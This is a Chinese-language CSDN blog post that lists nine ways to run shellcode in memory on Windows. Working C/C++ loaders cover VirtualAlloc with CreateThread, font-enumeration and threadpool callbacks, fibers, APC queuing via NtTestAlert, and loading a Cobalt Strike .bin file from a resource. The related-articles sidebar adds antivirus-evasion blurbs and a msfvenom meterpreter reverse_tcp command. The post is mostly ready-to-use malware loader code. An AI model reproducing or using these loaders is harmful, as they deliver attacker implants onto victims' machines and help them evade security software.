shellcode加载方式

最新推荐文章于 2024-07-02 10:08:41 发布
最新推荐文章于 2024-07-02 10:08:41 发布
阅读量346 收藏 1
点赞数
文章标签: c++ 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50217210/article/details/133852442
版权

1.指针加载

((void(*)())p)();

void* p ((void(*)())p)()

  1. p首先是一个指针,
  2. void(*)() 是一个函数指针类型:它告诉编译器,我们有一个函数指针,指向一个不返回任何值(void)的函数。这个函数指针类型的声明与你要调用的函数的签名匹配。
  3. (void(*)())p 这一部分将指针 p 从它原来的类型(可能是其他函数指针类型或空指针类型)转换为一个无返回值的函数指针类型。这种类型转换是为了确保 p 能够正确地被调用,因为在C语言中,函数指针的类型非常重要
  4. ((void(*)())p)():执行

2.汇编执行

#include <stdio.h>
#include <windows.h>
 
// .data段(数据段,存储静态变量和全局变量)改为可读可写可执行
#pragma comment(linker, "/section:.data,RWE")
 
unsigned char buf[] = "shellcode"; // 要为全局变量
 
int main() {
    __asm {
        lea eax, buf // 这里查看反汇编是lea eax,[buf地址]
        call eax
    }
    return 0;
}

注:lea是“Load Effective Address ”的缩写 --加载有效地址

3.创建线程执行

#include <stdio.h>
#include <windows.h>
 
int main() {
    unsigned char buf[] = "shellcode";
 
    void* p = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    // CopyMemory是Windows API
    CopyMemory(p, buf, sizeof(buf)); // 将shellcode写入内存

    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)(LPVOID)p, NULL, 0, NULL); 
   
    WaitForSingleObject(hThread, INFINITE); // 等待新线程执行完毕,不等待可能执行不到
    return 0;
}

4.回调函数执行

#include <stdio.h>
#include <Windows.h>
 
int main() {
    unsigned char buf[] = "shellcode";
 
    void* p = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(p, buf, sizeof(buf));
    
    /*
    * EnumFontsW是Windows API,用于枚举系统中所有可用字体
    * 参数1:设备环境句柄,表示要枚举哪个设备的字体
    * 参数2:NULL表示枚举所有字体
    * 参数3:回调函数指针,用于处理每个枚举到的字体信息
    * 参数4:回调函数参数
    */
    EnumFontsW(GetDC(NULL), NULL, p, NULL); // 回调函数
    return 0;
}

5.线程池等待对象回调函数执行--我最喜欢用的方式

#include <stdio.h>
#include <Windows.h>
 
int main() {
    unsigned char buf[] = "shellcode";
    DWORD oldProtect;
    VirtualProtect((LPVOID)buf, sizeof(buf), PAGE_EXECUTE_READWRITE, &oldProtect); // shellcode内存后修改为可读可写可执行

    HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
  
    PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)(LPVOID)buf, NULL, NULL);
    
    SetThreadpoolWait(threadPoolWait, event, NULL);
    WaitForSingleObject(event, INFINITE); // 等待事件对象执行完毕(状态变为无信号),事件对象执行会执行回调函数buf
    return 0;
}

6.创建纤程(Fiber)执行

纤程是比线程更小的执行单位

#include <stdio.h>
#include <Windows.h>
 
int main() {
    unsigned char buf[] = "shellcode";
 
    DWORD oldProtect;
    VirtualProtect((LPVOID)buf, sizeof(buf), PAGE_EXECUTE_READWRITE, &oldProtect);
 
    ConvertThreadToFiber(NULL); // 将当前线程转换为纤程(轻量级线程)
    
    void* shellcodeFiber = CreateFiber(0, (LPFIBER_START_ROUTINE)(LPVOID)buf, NULL);
    SwitchToFiber(shellcodeFiber); // 切换纤程,执行函数
    DeleteFiber(shellcodeFiber); // 删除纤程对象
    return 0;
}

7.NtTestAlert+APC执行

#include <stdio.h>
#include <Windows.h>
 
// 定义的一个函数指针类型pNtTestAlert,函数使用__stdcall调用约定(用于大多数Win32 API函数),函数返回DWORD类型
typedef DWORD(WINAPI* pNtTestAlert)();
 
int main() {
    unsigned char buf[] = "shellcode";
 
    DWORD oldProtect;
    VirtualProtect((LPVOID)buf, sizeof(buf), PAGE_EXECUTE_READWRITE, &oldProtect);
 
    /*
    * GetModuleHandleA用于获取DLL的句柄
    * GetProcAddress用于获取函数地址
    * NtTestAlert函数是内部函数,无法直接通过函数名调用
    */
    pNtTestAlert NtTestAlert = (pNtTestAlert)(GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert"));
    /*
    * QueueUserAPC是Windows API,用于将APC函数插入到指定线程的APC队列中
    * 参数1:APC函数指针
    * 参数2:指定线程句柄
    * 参数3:APC函数参数
    * GetCurrentThread是Windows API,返回当前执行的线程的句柄
    */
    QueueUserAPC((PAPCFUNC)(PTHREAD_START_ROUTINE)(LPVOID)buf, GetCurrentThread(), NULL);
    NtTestAlert(); // 该函数会检查当前线程的APC队列是否有待执行的异步过程调用,如果有就会立刻执行
    return 0;
}

这也是一个优质的执行方法,值得深入研究一下

8.从资源文件加载

源文件->添加->资源->导入->CS生成的.bin文件->资源类型(xxx)

在resource.h查看资源ID(#define IDR_XXX1)

#include <stdio.h>
#include <windows.h>
#include "resource.h" // 将资源文件 resource.h 中定义的资源包含到当前文件
 
int main() {
    /*
    * FindResource是windows API,用于在资源表中查找指定名称和类型的资源
    * 参数1:模块句柄,表示要在哪个模块中查找资源,NULL表示在当前模块中查找
    * 参数2:查找资源的名称或ID,如果是用ID,则需要使用宏 MAKEINTRESOURCE 将ID转换为字符串类型
    * 参数3:资源类型名称
    */
    HRSRC Res = FindResource(NULL, MAKEINTRESOURCE(IDR_XXX1), L"xxx");
    DWORD Size = SizeofResource(NULL, Res); // Windows API,用于获取资源大小
    HGLOBAL Load = LoadResource(NULL, Res); // Windows API,用于加载资源
 
    void* p = VirtualAlloc(NULL, Size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(p, Load, Size);
 
    ((void(*)())p)();
    return 0;
}

9.窗口函数执行

CallWindowProc((WNDPROC)(char*)arr, (HWND)0, 0, 0, 0);

云棋
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
shellcode加载器--从入门到放弃
Mccc_li的博客
03-12 3687
test https://www.freebuf.com/articles/system/133990.html https://www.freebuf.com/sectool/254891.html https://www.freebuf.com/articles/network/249014.html https://www.cnblogs.com/-qing-/p/12234148.html#_lab2_1_1 https://www.freebuf.com/articles/system/22823
shellcode加载
10-02
Shellcode加载器是一种技术,主要用于在目标系统上执行任意代码,通常用于渗透测试或恶意软件开发。Shellcode是一小段机器码,可以直接被CPU执行,而无需通过解释器或虚拟机。这种加载器的设计旨在绕过安全机制,...
go-shellcode:将Shellcode加载到新进程中
02-06
壳码 这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。 用法 请记住,只有64位shellcode将在64位进程中运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444 c:\windows\temp>sc.exe fce8820000006089e531c0648b5030
强对抗的 SquidLoader 针对中国企业发起攻击
FreeBuf_的博客
07-02 600
研究人员近期发现了一种高对抗强度的 Loader,其通过钓鱼邮件附件传递给受害者。根据恶意软件所具备的引诱和规避行为,研究人员将其命名为 SquidLoader。SquidLoader 最早在 2024 年 4 月下旬被发现,但研究人员认为其至少已经活跃了一个月以上。SquidLoader 后续投递的是 Cobalt Strike,也都经过加强以对抗静态分析。根据 SquidLoader 的配置信息,研究人员发现过去两年中主要在针对讲中文的受害者进行攻击。
C#加载shellcode
热门推荐
神棍之路
08-25 7万+
using System; using System.Runtime.InteropServices; namespace TCPMeterpreterProcess { class Program { static void Main(string[] args) { // native function’s compile
Shellcode分离加载实现免杀的两种方式(VT免杀率:1/68)
xf555er的博客
05-24 2849
本文详细介绍了如何通过文件加载和远程URL加载方式实现Shellcode分离加载,以规避安全软件的检测。文章首先描述了通过Metasploit Framework生成的shellcode文件加载的过程,并提供了相关的C++代码。为了避免被杀毒软件检测,利用动态API调用和lazy_importer项目进行代码优化。其次,文章讨论了如何通过远程URL加载shellcode,也提供了相应的实现代码。
总结加载Shellcode的各种方式(更新中!)
xf555er的博客
05-24 2451
异步过程调用(APC)队列是一个与线程关联的队列,用于存储要在该线程上下文中异步执行的函数。操作系统内核会跟踪每个线程的 APC 队列,并在适当的时机触发队列中挂起的函数。APC 队列通常用于实现线程间的异步通信、定时器回调以及异步 I/O 操作。内核模式 APC:由内核代码发起,通常用于处理内核级别的异步操作,如异步 I/O 完成。用户模式 APC:由用户代码发起,允许用户态应用程序将特定函数插入到线程的 APC 队列中,以便在线程上下文中异步执行。
Shellcode提取、加载与解析
莫慌的博客
03-06 1982
msf的shellcode 如何实现的
基于Java实现的Shellcode加载
最新发布
07-16
【作品名称】:基于Java实现的Shellcode加载器 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: ava ShellCode Loader...
shellcode加载器用于加密shellcode的py小玩意
10-03
"shellcode加载器"是一种工具,其目的是将shellcode注入到目标进程中,以便在运行时执行。本话题涉及的"shellcode加载器用于加密shellcode的py小玩意"是一个Python程序,设计用于加密shellcode,增加其隐蔽性,并...
基于Java实现的Shellcode加载器源码+项目说明.zip
12-29
基于Java实现的Shellcode加载器源码+项目说明.zip基于Java实现的Shellcode加载器源码+项目说明.zip基于Java实现的Shellcode加载器源码+项目说明.zip基于Java实现的Shellcode加载器源码+项目说明.zip
一段动态装载DLL的ShellCode汇编代码
09-10
一段动态装载DLL的ShellCode汇编代码,不需要引入任何的库
NimShellCodeLoader:使用nim编写的shellcode加载
02-03
NimShellCodeLoader Nim编写Windows平台shellcode免杀加载器 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:支持两种加密技术,分别位3des加密和凯撒密码,密钥随机,每次生成文件拥有不同的哈希 完全针对技术研究和获得正式授权的测试活动。 ##文件组成: bin中存放生成的重组文件 encryption存储加密代码文件 module中存放c ++功能文件 安装: 1,安装nim最新版 2,下载本项目,分别编译encryption中的Tdea.nim和Caesar.nim 。 nim c -d:release --opt:size Tdea.nim nim c -d:release --opt:size Caesar.nim 3,编译c#项目,将初始化文件放到当前目录 使用方法: 1,打开生成器 2,将有效载荷到该窗口 3,选择加载方式,点击生成,还原文件会保存到bin文件夹中 拓展: 1,新建ni
Shellcode与动态加载
tuobaofeng的专栏
05-08 867
.386 .model flat,stdcall option casemap:none include windows.inc .code;代码段 start:;好了我们开始我们的Shellcode代码 push ebp sub esp,100 mov ebp,esp;预留函数地址空间下面我们把动态库基址和函数地址都存在ebp里面 ;**********************
java 加载shellcode_各种语言实现Shellcode加载(暂时两种)
weixin_39660931的博客
02-26 538
原理:使用Shellcode加载器分离的方法,方法很low,但是值得尝试Python参考自K8Shellcode混合加密造轮子,造轮子QAQ(K8师傅的那个已经过不了检测了)编译用法的话则是结果如下虽然VT检出率挺高的但是过360还是可以的估计动态免杀是过不了的参考资料C/C++语言实现Shellcode加载Shellcode的代码C++这些东西还是不太懂得,大约就是申请虚拟内存,将shel...
用C和Go语言加载shellcode
眼科住院医一枚,偶尔搞搞赛博朋克
02-26 1009
用C和Go语言加载shellcode
动态加载 ShellCode绕过杀软
CSDN
08-11 5103
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?事实证明这样做可以绕过大多数杀软的查杀。虽然这种绕过方法并不是新鲜技术,但绕过反病毒软件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virscan作为我们的检测工具,并使用Metasploit生成一些反向的ShellCode作为我们的攻击载荷。
C++ 通过URL载入ShellCode代码
CSDN
06-02 4975
将生成的shellcode放到web服务器上,本地不保存恶意代码,本地只负责加载到内存运行,这样可以很好的躲过查杀。3.最后,生成成功后,我们将攻击主机运行一个监听事件,然后打开生成后的后门,然后发现能够成功上线。2.使用获取代码,前提搭建好http服务器,并将shellcode写入服务器页面中。3.处理shellcode代码,并将其加载到堆,并设置可读可执行,执行代码反弹即可。49个引擎,只有三个报毒。
C语言实现shellcode通用框架二:文件下载执行或内存加载
yan_star的博客
01-21 1183
简介: 承接接上篇。上篇(C语言实现shellcode通用框架一:解密执行)我们的第二层shellcode核心代码都是事先加密好嵌套在第一层shellcode中,核心代码更新起来不方便。所以联网更新显得尤为重要。大家可以选择内存加载,这样可以避免落地被杀软查杀,也可以选择落地,随意选择,思想和代码很重要。其实,这篇介绍的shellcode框架代码和上篇大同小异,无非是API、动态库多了一些,代码量有所变大,但是核心思想,代码逻辑还是一样的。开下源,希望对大家学习有所帮助。关于内存加载那块我注释并标出了,使
python shellcode加载
09-19
### 回答1: Python shellcode 加载器是一个程序,它能够从字节串中动态地加载和执行二进制代码。这种技术通常用于绕过安全措施,因为它可以避免将可疑代码写入硬盘驱动器或在文件中进行存储,而是将其保存在内存中直接执行。 ### 回答2: Python shellcode加载器是一种用Python编写的程序,用于加载和执行Shellcode(一段机器码,通常用于执行系统级操作)的工具。Shellcode加载器通常用于渗透测试、恶意软件开发或安全研究等领域。 Python shellcode加载器的实现主要包括以下几个步骤: 1. 解析Shellcode加载器首先需要解析Shellcode,将其转换为可执行的格式。这包括解析Shellcode的字节序列、指令等。 2. 构建可执行载体:加载器需要构建一个可执行的载体程序,用于将Shellcode加载到内存中执行。这个载体程序可以是Python脚本,也可以是其他编程语言编写的程序。 3. 加载和执行Shellcode加载器将Shellcode加载到内存中,并在适当的内存位置执行Shellcode。为了提高Shellcode的执行效率和稳定性,加载器通常会在内存中申请合适大小的空间,并将Shellcode复制到这个地址。 4. 执行后续操作:一旦Shellcode执行完成,加载器可以根据需要进行后续操作,如输出结果、清理内存等。 Python shellcode加载器的优点在于使用简便、跨平台性好以及Python本身的强大功能。通过使用Python的相关库和模块,可以方便地实现Shellcode加载器,并完成Shellcode加载和执行。此外,Python shellcode加载器还可以与其他工具或环境配合使用,如反射DLL注入、远程执行等,提供更多的功能和灵活性。 总而言之,Python shellcode加载器是一种用Python编写的工具,用于加载和执行Shellcode的程序。它能够方便地解析、加载和执行Shellcode,并提供了更多的灵活性和功能扩展。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值